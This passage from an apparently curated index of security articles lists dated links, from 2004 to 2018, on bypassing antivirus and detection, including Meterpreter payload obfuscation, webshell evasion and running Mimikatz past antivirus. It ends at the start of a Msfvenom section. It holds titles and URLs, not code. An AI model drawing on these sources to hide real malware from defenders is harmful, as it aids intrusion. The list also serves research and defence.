2018](http://digitalforensicstips.com/2018/01/ghostwriting-for-antivirus-evasion-in-2018/) - 2018.01 [hyperiongray] [Malicious Excel DDE Execution with ML AV Bypass and Persistence](https://blog.hyperiongray.com/excel-dde-exploitation-and-ml-av-bypass/) - 2017.12 [evi1cg] [BypassAV With ReflectivePEInjection](https://evi1cg.me/archives/BypassAV_With_ReflectivePEInjection.html) - 2017.12 [freebuf] [Meterpreter免杀及对抗分析](http://www.freebuf.com/sectool/157122.html) - 2017.12 [freebuf] [Windows Payload免杀方法实验](http://www.freebuf.com/articles/system/156710.html) - 2017.12 [4hou] [杀软对抗:一个面向渗透工程师的杀软绕过思路分享(含实现代码)](http://www.4hou.com/penetration/8765.html) - 2017.11 [freebuf] [海莲花团伙利用MSBuild机制免杀样本分析](http://www.freebuf.com/articles/system/154947.html) - 2017.11 [freebuf] [Metasploit自动化Bypass Av脚本:Shecodject X Shellcode Injection](http://www.freebuf.com/sectool/154356.html) - 2017.11 [360] [海莲花团伙利用MSBuild机制免杀样本分析](https://www.anquanke.com/post/id/87299/) - 2017.11 [venus] [海莲花团伙利用MSBuild机制免杀样本分析](https://paper.seebug.org/462/) - 2017.10 [insinuator] [使用 Mimikatz 提取“不可导出”的证书和私钥,使用 Powersploit 躲避 AV 检测](https://insinuator.net/2017/10/extract-non-exportable-certificates-and-evade-anti-virus-with-mimikatz-and-powersploit/) - 2017.10 [secist] [PHP之编写日志文件留后门(免杀)](http://www.secist.com/archives/5352.html) - 2017.10 [icebrg] [APT 组织 FIN7 使用新技巧躲避检测](https://www.icebrg.io/blog/old-dog-new-tricks-fin7-pushing-new-techniques-to-evade-detection) - 2017.08 [freebuf] [BlackHat后续:可绕过杀软的免杀工具AVPASS?随我一探究竟](http://www.freebuf.com/articles/terminal/144769.html) - 2017.08 [pediy] [[原创]BlackHat后续:可绕过杀软的免杀工具AVPASS?360:独家解析](https://bbs.pediy.com/thread-220486.htm) - 2017.08 [cybereason] [Cerber ransomware variants now actively try to detect and evade Canary files](https://www.cybereason.com/blog/cerber-ransomware-vaccine) - 2017.08 [freebuf] [工具解析|杀毒引擎惨遭打脸,黑帽大会爆惊天免杀工具](http://www.freebuf.com/news/142758.html) - 2017.08 [crowdstrike] [How to Block Malicious PowerShell Activity: Bypassing Traditional AV](https://www.crowdstrike.com/blog/tech-center/how-to-block-malicious-powershell-activity/) - 2017.07 [freebuf] [安天移动安全联合猎豹揭秘无形之贼Dosoft免杀病毒](http://www.freebuf.com/articles/system/141564.html) - 2017.07 [pentestlab] [绕过反病毒软件和主机入侵检测系统](https://pentestlab.blog/2017/07/26/bypassing-antivirus-host-intrusion-prevention-systems/) - 2017.07 [avlsec] [安天移动安全联合猎豹揭秘无形之贼Dosoft免杀病毒](http://blog.avlsec.com/2017/07/4777/dosoft/) - 2017.07 [hackers] [How to Evade Detection with proxychains](https://www.hackers-arise.com/single-post/2017/05/01/How-to-Evade-Detection-with-proxychains) - 2017.07 [DoktorCranium] [Bypassing Antivirus on modern OSX with metasploit](https://www.youtube.com/watch?v=y5_pDQA8088) - 2017.07 [freebuf] [恶性病毒Pengex通过系统盘疯狂传播,攻击所有主流杀软却唯独放过腾讯](http://www.freebuf.com/news/139381.html) - 2017.07 [4hou] [恶性病毒Pengex通过系统盘疯狂传播:攻击所有主流杀软,唯独放过腾讯](http://www.4hou.com/info/news/6146.html) - 2017.07 [venus] [恶性病毒 Pengex 通过系统盘疯狂传播 攻击所有主流杀软 唯独放过腾讯](https://paper.seebug.org/347/) - 2017.06 [govolution] [Using msf alpha_mixed encoder for antivirus evasion](https://govolution.wordpress.com/2017/06/16/using-msf-alpha_mixed-encoder-for-antivirus-evasion/) - 2017.06 [pediy] [[原创]改一个字节轻松免杀,从蓝屏电脑发现腾讯“暗云Ⅲ木马专杀”的坑爹技术](https://bbs.pediy.com/thread-218484.htm) - 2017.06 [freebuf] [Metasploit实验:制作免杀payload+对任意“外网”主机的远控](http://www.freebuf.com/sectool/136736.html) - 2017.06 [eyeofrablog] [Bypass antivirus with simple RTF tricks.](https://eyeofrablog.wordpress.com/2017/06/11/bypass-antivirus-with-simple-rtf-tricks/) - 2017.06 [ms509] [分享一种可关闭大多数杀软的技术(对360安全卫士已验证成功)](http://www.ms509.com/2017/06/06/bypass360-analysis/) - 2017.06 [freebuf] [分享一种可关闭大多数杀软的技术(对360安全卫士已验证成功)](http://www.freebuf.com/articles/system/135708.html) - 2017.05 [360] [CVE-2017-0199结合powershell过杀软弹回meterpreter](https://www.anquanke.com/post/id/86142/) - 2017.05 [pediy] [[原创]免杀技术有一套(免杀方法大集结)(Anti-AntiVirus)](https://bbs.pediy.com/thread-217782.htm) - 2017.05 [arxiv] [[1705.07263] Adversarial Examples Are Not Easily Detected: Bypassing Ten Detection Methods](https://arxiv.org/abs/1705.07263) - 2017.05 [crowdstrike] [How to Install Falcon Antivirus (AV) on the Mac Platform](https://www.crowdstrike.com/blog/tech-center/how-to-install-the-falcon-sensor-for-mac/) - 2017.05 [attify] [如何使用Frida绕过iOS应用的越狱检测](http://blog.attify.com/2017/05/06/bypass-jailbreak-detection-frida-ios-applications/) - 2017.05 [attify] [Bypass Jailbreak Detection with Frida in iOS applications](https://blog.attify.com/bypass-jailbreak-detection-frida-ios-applications/) - 2017.05 [hackers] [How to Evade AV with OWASP-ZSC, Part 1](https://www.hackers-arise.com/single-post/2017/05/03/How-to-Evade-AV-with-OWASP-ZSC-Part-1) - 2017.05 [mcafee] [Cerber Ransomware Evades Detection With Many Components](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cerber-ransomware-evades-detection-with-many-components/) - 2017.05 [mcafee] [Cerber Ransomware Evades Detection With Many Components](https://securingtomorrow.mcafee.com/mcafee-labs/cerber-ransomware-evades-detection-with-many-components/) - 2017.04 [countercept] [AV Bypass Techniques through an EDR Lens](https://countercept.com/blog/av-bypass-techniques-through-an-edr-lens/) - 2017.04 [countercept] [常用通过自解密绕过杀软的技巧分析,以及 EDR 如何防护。(EDR:Endpoint Detection & Response,终端检测和相应)](https://countercept.com/our-thinking/av-bypass-techniques-through-an-edr-lens/) - 2017.04 [hipaajournal] [Webroot AV Update Failure Causes Havoc: Windows System Files and EXE Files Quarantined](https://www.hipaajournal.com/webroot-av-update-failure-8781/) - 2017.04 [aliyun] [Cobalt Strike搭建和使用以及bybass杀软](https://xz.aliyun.com/t/199) - 2017.04 [securelist] [Old Malware Tricks To Bypass Detection in the Age of Big Data](https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/) - 2017.03 [4hou] [免杀的艺术:史上最全的汇编Shellcode的技巧(三)](http://www.4hou.com/technology/3893.html) - 2017.03 [4hou] [免杀的艺术:PE文件后门的植入(二)](http://www.4hou.com/technology/3882.html) - 2017.03 [360] [针对利用DNS的TXT记录查询进行通信绕过杀软检测的木马分析](https://www.anquanke.com/post/id/85720/) - 2017.03 [4hou] [免杀艺术 1: 史上最全的免杀方法汇总](http://www.4hou.com/technology/3853.html) - 2017.03 [cobbr] [ObfuscatedEmpire - Use an obfuscated, in-memory PowerShell C2 channel to evade AV signatures](https://cobbr.io/ObfuscatedEmpire.html) - 2017.03 [redcanary] [Bypassing Application Whitelisting: How IT Teams Can Detect It](https://redcanary.com/blog/bypassing-application-whitelisting/) - 2017.02 [360] [通过DNS传输后门来绕过杀软](https://www.anquanke.com/post/id/85431/) - 2017.01 [crowdstrike] [How to Replace Traditional Antivirus (AV) with CrowdStrike Falcon](https://www.crowdstrike.com/blog/tech-center/how-to-replace-traditional-av-with-falcon/) - 2017.01 [HackersOnBoard] [DEF CON 24 - The Remote Metamorphic Engine - Detecting - Evading - Attacking](https://www.youtube.com/watch?v=Uaunytw-otk) - 2017.01 [4hou] [如何绕过杀软执行 Mimikatz?](http://www.4hou.com/technology/2910.html) - 2017.01 [averagesecurityguy] [Bypassing AntiVirus with Golang](https://averagesecurityguy.github.io/2017/01/06/bypassing-av-with-golang/) - 2017.01 [blackhillsinfosec] [How to Bypass Anti-Virus to Run Mimikatz](https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/) - 2016.12 [HackingMonks] [Honeypots (create,detect and bypass)](https://www.youtube.com/watch?v=HvuIYE7UMHs) - 2016.12 [kalitutorials] [Use Python To Detect And Bypass Web Application Firewall](https://www.kalitutorials.net/2016/12/python-detect-and-bypass-web-application-firewall.html) - 2016.12 [pentest] [Art of Anti Detection 1 – Introduction to AV & Detection Techniques](https://pentest.blog/art-of-anti-detection-1-introduction-to-av-detection-techniques/) - 2016.11 [360] [assert免杀一句话](https://www.anquanke.com/post/id/85017/) - 2016.11 [morphisec] [New Wave of Hancitor Comes with New Evasive Techniques](http://blog.morphisec.com/hancitor-macro-malware-with-process-hollowing) - 2016.11 [0x00sec] [Pirating Illegally - How to Evade ISP Detection](https://0x00sec.org/t/pirating-illegally-how-to-evade-isp-detection/1303/) - 2016.11 [freebuf] [Meterpreter免杀技巧分享(亲测有效)](http://www.freebuf.com/sectool/118714.html) - 2016.11 [vkremez] [Bypassing Anti-Virus Signature Detection](https://www.vkremez.com/2016/11/bypassing-anti-virus-signature-detection.html) - 2016.10 [qq] [宏病毒利用EnumDateFormats执行Shellcode创建傀进程绕杀软](https://tav.qq.com/index/newsDetail/260.html) - 2016.10 [4hou] [如何打造一款免杀Metasploit WAR木马?](http://www.4hou.com/technology/1593.html) - 2016.10 [brokenbrowser] [Detecting Local Files to Evade Analysts (IE)](http://www.brokenbrowser.com/detecting-local-files-to-evade-analysts/) - 2016.10 [ms509] [可关闭大部分杀软的技术?针对360卫士已验证成功](http://www.ms509.com/2016/10/13/bypass-360/) - 2016.08 [qq] [BootKit成“异鬼”:通过感染VBR绕过杀软](https://tav.qq.com/index/newsDetail/255.html) - 2016.08 [blackhillsinfosec] [Powershell Without Powershell – How To Bypass Application Whitelisting, Environment Restrictions & AV](https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/) - 2016.08 [LoiLiangYang] [How Does Antivirus Software Work And How To Evade It](https://www.youtube.com/watch?v=1_rXO2Es5B8) - 2016.08 [360] [js敲诈者变种利用PowerShell免杀分析](https://www.anquanke.com/post/id/84421/) - 2016.08 [fortinet] [New Era in Anti-Virus Detection Evasions](https://www.fortinet.com/blog/threat-research/new-era-in-anti-virus-detection-evasions.html) - 2016.07 [netnea] [Having Fun with New Evasions](http://www.netnea.com/cms/2016/07/26/having-fun-with-new-evasions/) - 2016.07 [virusbulletin] [Paper: The Journey of Evasion Enters Behavioural Phase](https://www.virusbulletin.com/blog/2016/07/paper-journey-evasion-enters-behavioural-phase/) - 2016.07 [securitygossip] [Evading Android Runtime Analysis via Sandbox Detection](http://securitygossip.com/blog/2016/07/19/2016-07-19/) - 2016.07 [sjtu] [Evading Android Runtime Analysis via Sandbox Detection](https://loccs.sjtu.edu.cn/gossip/blog/2016/07/19/2016-07-19/) - 2016.07 [blackhillsinfosec] [Three Simple Disguises for Evading Antivirus](https://www.blackhillsinfosec.com/three-simple-disguises-for-evading-antivirus/) - 2016.06 [duo] [Ransomware Evades Antivirus and Microsoft Security Tools, Targets Office 365](https://duo.com/blog/ransomware-evades-antivirus-and-microsoft-security-tools-targets-office-365) - 2016.06 [mcafee] [Threat Actors Employ COM Technology in Shellcode to Evade Detection](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/threat-actors-employ-com-technology-shellcode-evade-detection/) - 2016.06 [mcafee] [Threat Actors Employ COM Technology in Shellcode to Evade Detection](https://securingtomorrow.mcafee.com/mcafee-labs/threat-actors-employ-com-technology-shellcode-evade-detection/) - 2016.05 [8090] [使用橡皮鸭硬件绕过杀软,渗透Win 7](http://www.8090-sec.com/archives/2510) - 2016.05 [freebuf] [使用橡皮鸭硬件绕过杀软,渗透Win 7](http://www.freebuf.com/articles/system/105616.html) - 2016.05 [trustlook] [Fake Adobe Flash App Evades Most Anti Virus Detection, Manipulates Phone by Command & Control Server in Latvia](https://blog.trustlook.com/2016/05/23/fake-adobe-flash-app-evades-most-anti-virus-detection-and-manipulates-phone-by-command-control-server-in-latvia/) - 2016.04 [rsa] [Detection of Squiblydoo COM+ Whitelist Bypassing with ECAT](https://community.rsa.com/community/products/netwitness/blog/2016/04/26/detection-of-com-whitelist-bypassing-with-ecat) - 2016.04 [blackhillsinfosec] [How to Bypass Application Whitelisting & AV](https://www.blackhillsinfosec.com/how-to-bypass-application-whitelisting-av/) - 2016.04 [gracefulsecurity] [Adventures in Anti-Virus Evasion](https://www.gracefulsecurity.com/anti-virus-evasion/) - 2016.04 [arno0x0x] [Meterpreter stage AV/IDS evasion with powershell](https://arno0x0x.wordpress.com/2016/04/13/meterpreter-av-ids-evasion-powershell/) - 2016.03 [freebuf] [如何利用十行代码,绕过杀毒软件实现免杀?](http://www.freebuf.com/articles/system/100147.html) - 2016.03 [hackingarticles] [Hack Remote Windows 10 PC using ARCANUS (Bypass All Antivirus)](http://www.hackingarticles.in/hack-remote-windows-10-pc-using-arcanus-bypass-antivirus/) - 2016.03 [attactics] [Bypassing Antivirus With Ten Lines of Code or (Yet Again) Why Antivirus is Largely Useless](http://www.attactics.org/2016/03/bypassing-antivirus-with-10-lines-of.html) - 2016.02 [evi1cg] [bypassAV_hanzoInjection](https://evi1cg.me/archives/bypassAV_hanzoInjection.html) - 2016.02 [notsosecure] [Bypassing Jailbreak Detection in iOS](https://www.notsosecure.com/bypassing-jailbreak-detection-ios/) - 2016.01 [] [我是标题党:免杀所有杀软的端口转发工具](http://www.91ri.org/15128.html) - 2016.01 [cylance] [CylancePROTECT® is the First Signature-less Next Generation Antivirus to be Certified by AV-TEST](https://www.cylance.com/en_us/blog/cylanceprotect-is-the-first-signature-less-next-generation-antivirus-to-be-certified-by-av-test.html) - 2016.01 [securitygossip] [Firmalice - Automatic Detection of Authentication Bypass Vulnerabilities in Binary Firmware](http://securitygossip.com/blog/2016/01/12/2016-01-12/) - 2016.01 [sjtu] [Firmalice - Automatic Detection of Authentication Bypass Vulnerabilities in Binary Firmware](https://loccs.sjtu.edu.cn/gossip/blog/2016/01/12/2016-01-12/) - 2016.01 [paloaltonetworks] [Angler Exploit Kit Continues to Evade Detection: Over 90,000 Websites Co](https://unit42.paloaltonetworks.com/angler-exploit-kit-continues-to-evade-detection-over-90000-websites-compromised/) - 2015.12 [ensilo] [You’re so predictable: the AV vulnerability that bypasses mitigations](https://blog.ensilo.com/the-av-vulnerability-that-bypasses-mitigations) - 2015.12 [alienvault] [Cherry Picker POS Malware Scraping Memory and Evading Detection](https://www.alienvault.com/blogs/security-essentials/cherry-picker-pos-malware-scraping-memory-and-evading-detection) - 2015.11 [freebuf] [修改Metasploit x64模版逃避杀软](http://www.freebuf.com/articles/web/84468.html) - 2015.10 [blackhillsinfosec] [Modifying Metasploit x64 template for AV evasion](https://www.blackhillsinfosec.com/modifying-metasploit-x64-template-for-av-evasion/) - 2015.10 [trendmicro] [New Headaches: How The Pawn Storm Zero-Day Evaded Java’s Click-to-Play Protection](https://blog.trendmicro.com/trendlabs-security-intelligence/new-headaches-how-the-pawn-storm-zero-day-evaded-javas-click-to-play-protection/) - 2015.09 [] [使用shellcode打造MSF免杀payload](http://www.91ri.org/14240.html) - 2015.09 [kaspersky] [AV-Comparatives awards Kaspersky Lab’s Anti-phishing technology](https://www.kaspersky.com/blog/av-comparatives-awards-kaspersky-labs-anti-phishing-technology/15097/) - 2015.08 [freebuf] [Payload生成器:Metasploit AV Evasion](http://www.freebuf.com/sectool/76073.html) - 2015.08 [alienvault] [FF-RAT Uses Stealth Tactics to Evade Endpoint Detection](https://www.alienvault.com/blogs/security-essentials/ff-rat-uses-stealth-tactics-to-evade-endpoint-detection) - 2015.08 [secist] [转载:PHP一句话过安全狗、360主机卫士、D盾等免杀思路!](http://www.secist.com/archives/579.html) - 2015.07 [ly0n] [Basic AV bypass](http://ly0n.me/2015/07/28/basic-av-bypass/) - 2015.07 [ly0n] [Basic AV bypass](https://paumunoz.tech/2015/07/28/basic-av-bypass/) - 2015.07 [hackingarticles] [Bypass Antivirus and Hack Remote Windows PC with shelter](http://www.hackingarticles.in/bypass-antivirus-and-hack-remote-windows-pc-with-shelter/) - 2015.07 [mcafee] [Threat Actors Use Encrypted Office Binary Format to Evade Detection](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/threat-actors-use-encrypted-office-binary-format-evade-detection/) - 2015.07 [mcafee] [Threat Actors Use Encrypted Office Binary Format to Evade Detection](https://securingtomorrow.mcafee.com/mcafee-labs/threat-actors-use-encrypted-office-binary-format-evade-detection/) - 2015.06 [sans] [CVE-2014-4114 and an Interesting AV Bypass Technique](https://isc.sans.edu/forums/diary/CVE20144114+and+an+Interesting+AV+Bypass+Technique/19809/) - 2015.06 [wojdwo] [Bypassing malware detection mechanisms in online banking](https://www.slideshare.net/wojdwo/bypassing-malware-detection-mechanisms-in-online-banking-confidence) - 2015.06 [mrg] [Generic bypass of next-gen intrusion / threat / breach detection systems](https://www.mrg-effitas.com/research/generic-bypass-of-next-gen-intrusion-threat-breach-detection-systems/) - 2015.05 [trustwave] [Malicious Macros Evades Detection by Using Unusual File Format](https://www.trustwave.com/Resources/SpiderLabs-Blog/Malicious-Macros-Evades-Detection-by-Using-Unusual-File-Format/) - 2015.04 [trustlook] [Trustlook Antivirus & Mobile Security Ranked Top In AV-TEST With Best Score](https://blog.trustlook.com/2015/04/16/trustlook-antivirus-mobile-security-ranked-top-in-av-test-with-best-score/) - 2015.04 [lastline] [Malware in the Wild: Evolving to Evade Detection](https://www.lastline.com/labsblog/malware-in-the-wild-evolving-to-evade-detection/) - 2015.03 [mcafee] [POS Malware Uses Time-Stamp Check to Evade Detection](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/pos-malware-uses-time-stamp-check-to-evade-detection/) - 2015.03 [mcafee] [POS Malware Uses Time-Stamp Check to Evade Detection](https://securingtomorrow.mcafee.com/mcafee-labs/pos-malware-uses-time-stamp-check-to-evade-detection/) - 2015.03 [y0nd13] [Bypassing AV in 2015](https://y0nd13.blogspot.com/2015/03/bypassing-av-in-2015.html) - 2015.03 [securitysift] [peCloak.py – An Experiment in AV Evasion](https://www.securitysift.com/pecloak-py-an-experiment-in-av-evasion/) - 2015.03 [sans] [How Malware Generates Mutex Names to Evade Detection](https://isc.sans.edu/forums/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/) - 2015.03 [duo] [Password-Stealing Tool Targets Windows; Evades Antivirus](https://duo.com/blog/password-stealing-tool-targets-windows-evades-antivirus) - 2015.02 [leonjza] [a trivial iOS jailbreak detection bypass](https://leonjza.github.io/blog/2015/02/20/a-trivial-ios-jailbreak-detection-bypass/) - 2015.02 [] [手工打造Windows下编译的免杀Payload](http://www.91ri.org/12226.html) - 2014.11 [arxiv] [[1411.6777] Modified Apriori Approach for Evade Network Intrusion Detection System](https://arxiv.org/abs/1411.6777) - 2014.08 [3xp10it] [assert免杀一句话](http://3xp10it.cc/web/2016/11/25/assert%E5%85%8D%E6%9D%80%E4%B8%80%E5%8F%A5%E8%AF%9D/) - 2014.08 [3xp10it] [免杀](http://3xp10it.cc/web/2016/12/21/%E5%85%8D%E6%9D%80/) - 2014.08 [3xp10it] [免杀](http://3xp10it.cc/web/2016/12/21/%E5%85%8D%E6%9D%80/) - 2014.08 [3xp10it] [assert免杀一句话](http://3xp10it.cc/web/2016/11/25/assert%E5%85%8D%E6%9D%80%E4%B8%80%E5%8F%A5%E8%AF%9D/) - 2014.08 [sevagas] [Bypass Antivirus Dynamic Analysis](https://blog.sevagas.com/?Bypass-Antivirus-Dynamic-Analysis) - 2014.07 [privacy] [AV Evasion 6: Best-Performing Tactics](http://privacy-pc.com/articles/av-evasion-6-best-performing-tactics.html) - 2014.07 [privacy] [AV Evasion 5: Blending in Instead of Hiding the Bad](http://privacy-pc.com/articles/av-evasion-5-blending-in-instead-of-hiding-the-bad.html) - 2014.07 [privacy] [AV Evasion 4: Encoders and Fuzzy NOPs Fail](http://privacy-pc.com/articles/av-evasion-4-encoders-and-fuzzy-nops-fail.html) - 2014.07 [privacy] [AV Evasion 3: EXE Templates and Run-Time Dynamic Linking](http://privacy-pc.com/articles/av-evasion-3-exe-templates-and-run-time-dynamic-linking.html) - 2014.06 [hackwhackandsmack] [JavaRMI Remote Class Loading Exploitation with AV Bypass](https://www.hackwhackandsmack.com/?p=315) - 2014.06 [privacy] [AV Evasion 2: Hurdles for Metasploit Payload Execution](http://privacy-pc.com/articles/av-evasion-2-hurdles-for-metasploit-payload-execution.html) - 2014.06 [privacy] [AV Evasion: Lessons Learned](http://privacy-pc.com/articles/av-evasion-lessons-learned.html) - 2014.05 [govolution] [Article about Antivirus Evasion](https://govolution.wordpress.com/2014/05/27/article-about-antivirus-evasion/) - 2014.05 [mcafee] [Necurs, Zbot Droppers Use Obfuscated Windows XP Detection to Bypass Automated Analysis](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/necurs-zbot-droppers-use-obfuscated-windows-xp-detection-bypass-automated-analysis/) - 2014.05 [mcafee] [Necurs, Zbot Droppers Use Obfuscated Windows XP Detection to Bypass Automated Analysis](https://securingtomorrow.mcafee.com/mcafee-labs/necurs-zbot-droppers-use-obfuscated-windows-xp-detection-bypass-automated-analysis/) - 2014.05 [rapid7] [Is AV dead? Why Symantec's executive is only half right about the state of anti-virus software](https://blog.rapid7.com/2014/05/09/is-av-dead/) - 2014.05 [rapid7] [Anti-Virus Evasion Makes Vulnerability Validation More Accurate](https://blog.rapid7.com/2014/05/02/anti-virus-evasion-makes-vulnerability-validation-more-accurate/) - 2014.04 [rapid7] [From the Trenches: AV Evasion With Dynamic Payload Generation](https://blog.rapid7.com/2014/04/14/from-the-trenches-av-evasion-with-dynamic-payload-generation/) - 2014.03 [rapid7] [New Metasploit 4.9 Helps Evade Anti-Virus Solutions, Test Network Segmentation, and Increase Productivity for Penetration Testers](https://blog.rapid7.com/2014/03/26/new-metasploit-49-helps-evade-anti-virus-solutions-test-network-segmentation-and-increase-productivity-for-penetration-testers/) - 2014.01 [ethicalhackingnews] [How to Change the Signature of Metasploit Payloads to Evade Antivirus Detection](https://ethicalhackingnews.blogspot.com/2014/01/how-to-change-signature-of-metasploit.html) - 2014.01 [rapid7] [Security Guide - Evading Anti-Virus Detection](https://blog.rapid7.com/2014/01/07/security-guide-evading-anti-virus-detection/) - 2013.11 [] [闲谈 bypass AV](http://www.91ri.org/7798.html) - 2013.10 [deepsec] [DeepSec 2013 Talk: Easy Ways To Bypass Anti-Virus Systems](http://blog.deepsec.net/deepsec-2013-talk-easy-ways-to-bypass-anti-virus-systems/) - 2013.10 [rsa] [New Kazy Variant Evades Research Detection Using "Chameleon Encoding"](https://community.rsa.com/community/products/netwitness/blog/2013/10/16/new-kazy-variant-evades-research-detection-using-chameleon-encoding) - 2013.08 [trustlook] [Craig Young's POC malware bypassed all security detection](https://blog.trustlook.com/2013/08/21/craig-youngs-poc-malware-bypassed-all-security-vendors/) - 2013.08 [hackingarticles] [Bypass Antivirus and Hack Remote Windows PC with Syringe](http://www.hackingarticles.in/bypass-antivirus-and-hack-remote-windows-pc-with-syringe/) - 2013.08 [] [利用procdump+Mimikatz 绕过杀软获取Windows明文密码](http://www.91ri.org/6881.html) - 2013.07 [pediy] [[原创]导入表静态特征免杀](https://bbs.pediy.com/thread-174933.htm) - 2013.06 [reverse] [Gone in 59 seconds: tips and tricks to bypass AppMinder’s Jailbreak detection](https://reverse.put.as/2013/06/30/gone-in-59-seconds-tips-and-tricks-to-bypass-appminders-jailbreak-detection/) - 2013.06 [] [对于脚本木马的免杀(特别针对安全狗的V3.0)的经验附过狗菜刀](http://www.91ri.org/6432.html) - 2013.06 [] [好免杀,hyperion造](http://www.91ri.org/6342.html) - 2013.06 [] [那些年一起绕过的杀软](http://www.91ri.org/6169.html) - 2013.05 [trendmicro] [Blackhole Spam Run Evades Detection Using Punycode](https://blog.trendmicro.com/trendlabs-security-intelligence/blackhole-spam-run-evades-detection-using-punycode/) - 2013.04 [rsa] [Zeus C&C Server Poses as Google to Evade Detection](https://community.rsa.com/community/products/netwitness/blog/2013/04/17/zeus-cc-server-poses-as-google-to-evade-detection) - 2013.04 [mcafee] [Phishing Threat Uses UTF-8 BOM in ZIP Signature to Evade Detection](https://securingtomorrow.mcafee.com/mcafee-labs/phishing-threat-uses-utf-8-bom-in-zip-signature-to-evade-detection/) - 2013.03 [malwarebytes] [New Exploit Kit, Ransomware and AV evasion](https://blog.malwarebytes.com/threat-analysis/2013/03/new-exploit-kit-ransomware-and-av-evasion/) - 2013.02 [mcafee] [Evasion Techniques: Encoded JavaScript Attacks PDF Files](https://securingtomorrow.mcafee.com/mcafee-labs/evasion-techniques-encoded-javascript-attacks-pdf-files/) - 2013.01 [netspi] [Bypassing Anti-Virus with Metasploit MSI Files](https://blog.netspi.com/bypassing-anti-virus-with-metasploit-msi-files/) - 2013.01 [rapid7] [Evading Anti-Virus Detection - Whiteboard Wednesday](https://blog.rapid7.com/2013/01/17/evading-anti-virus-detection-whiteboard-wednesday/) - 2013.01 [netspi] [10 Evil User Tricks for Bypassing Anti-Virus](https://blog.netspi.com/10-evil-user-tricks-for-bypassing-anti-virus/) - 2012.12 [hackingarticles] [Bypassing Antivirus using Multi Pyinjector Shell Code Injection in SET Toolkit](http://www.hackingarticles.in/bypassing-antivirus-using-multi-pyinjector-shellcode-injection-in-set-toolkit/) - 2012.12 [pediy] [[原创]一种绕过现代杀软主动防御功能的思路](https://bbs.pediy.com/thread-159721.htm) - 2012.11 [cyberarms] [Bitdefender wins Anti-Virus Test while Microsoft AV Failed Certification](https://cyberarms.wordpress.com/2012/11/30/bitdefender-wins-anti-virus-test-while-microsoft-av-failed-certification/) - 2012.10 [] [免杀shell-weevely分析](http://www.91ri.org/4463.html) - 2012.09 [y0nd13] [Bypass PHP ShellDetector: Poorman Style](https://y0nd13.blogspot.com/2012/09/bypass-php-shelldetector-poorman-style.html) - 2012.09 [] [最新免杀php后门一句话](http://www.91ri.org/3952.html) - 2012.08 [christophertruncer] [Bypass Antivirus with Meterpreter as the Payload & Hyperion Fun](https://www.christophertruncer.com/bypass-antivirus-with-meterpreter-as-the-payload-hyperion-fun/) - 2012.08 [hackingarticles] [Hack Windows7 PC using Powershell Attack Vector in Social Engineering Toolkit (Bypassing Antivirus)](http://www.hackingarticles.in/hack-windows7-pc-using-powershell-attack-vector-in-social-engineering-toolkit-bypassing-antivirus/) - 2012.08 [cyberarms] [Social Engineering Toolkit: Bypassing Anti-Virus using Powershell](https://cyberarms.wordpress.com/2012/08/02/social-engineering-toolkit-bypassing-anti-virus-using-powershell/) - 2012.07 [rapid7] [New Metasploit 4.4: Risk Validation for Vulnerability Management with Nexpose, Improved AV Evasion, and Faster UI](https://blog.rapid7.com/2012/07/17/risk-validation-and-verification-in-vulnerability-management-with-metasploit/) - 2012.07 [trustedsec] [Egress Buster Reverse Shell and Bypassing AV](https://www.trustedsec.com/2012/07/egress-buster-reverse-bypassav/) - 2012.07 [DoktorCranium] [Comodo Internet Security AV & Sandbox bypass](https://www.youtube.com/watch?v=TopCisbEbWU) - 2012.05 [] [关于php一句话免杀的分析](http://www.91ri.org/3191.html) - 2012.02 [reverse] [AV-monster: the monster that loves yummy OS X anti-virus software](https://reverse.put.as/2012/02/13/av-monster-the-monster-that-loves-yummy-os-x-anti-virus-software/) - 2011.08 [pediy] [[翻译]Bypassing AntiVirus Detection for Malicious PDFs](https://bbs.pediy.com/thread-139038.htm) - 2011.05 [y0nd13] [Evading Antivirus Emulator using stealth meterpreter](https://y0nd13.blogspot.com/2011/05/evading-antivirus-emulator-using.html) - 2011.01 [elearnsecurity] [Evading Antiviruses with msfencode](https://blog.elearnsecurity.com/evading-antiviruses-with-msfencode.html) - 2010.12 [scrt] [Bypass “Simple” de proxy antivirus](https://blog.scrt.ch/2010/12/02/bypass-simple-de-proxy-antivirus/) - 2010.08 [console] [Bypassing AntiVirus With Process Injection](http://console-cowboys.blogspot.com/2010/08/bypassing-antivirus-with-process.html) - 2010.06 [trustedsec] [Anti-Virus Evasion through JavaScript Obfuscation](https://www.trustedsec.com/2010/06/anti-virus-evasion-through-javascript-obfuscation/) - 2010.04 [krebsonsecurity] [Fake Anti-virus Peddlers Outmaneuvering Legitimate AV](https://krebsonsecurity.com/2010/04/fake-anti-virus-peddlers-outmaneuvering-legitimate-av/) - 2009.05 [skullsecurity] [Bypassing AV over the Internet with Metasploit](https://blog.skullsecurity.org/2009/bypassing-av-over-the-internet-with-metasploit) - 2008.01 [oberheide] [Detecting and Evading CWSandbox](https://jon.oberheide.org/blog/2008/01/15/detecting-and-evading-cwsandbox/) - 2007.10 [pediy] [[原创]Keymake脱壳+补附加数据+免杀](https://bbs.pediy.com/thread-52684.htm) - 2006.12 [sans] [Malformed MIMEs can bypass AV](https://isc.sans.edu/forums/diary/Malformed+MIMEs+can+bypass+AV/1918/) - 2006.06 [sans] [Snort URL evasion vulnerability patched and version 2.6.0 available](https://isc.sans.edu/forums/diary/Snort+URL+evasion+vulnerability+patched+and+version+260+available/1382/) - 2005.11 [sans] [F-Prot Anti-Virus Scanning Engine Bypass](https://isc.sans.edu/forums/diary/FProt+AntiVirus+Scanning+Engine+Bypass/820/) - 2004.10 [sans] [Multiple anti-virus software evasion](https://isc.sans.edu/forums/diary/Multiple+antivirus+software+evasion/341/) *** ## <a id="d9b2e74a805ed64182b5784b7fa2a4fb"></a>Msfvenom ### <a id="5a642a096788ca0c11bef126b533c6ad"></a>Msfvenom - 2018.08 [code610] [venome.sh - simple msfvenom "generator"](https://code610.blogspot.com/2018/08/venomesh-simple-msfvenom-generator.html) - 2017.09 [n0where] [MSFvenom Payload Creator: 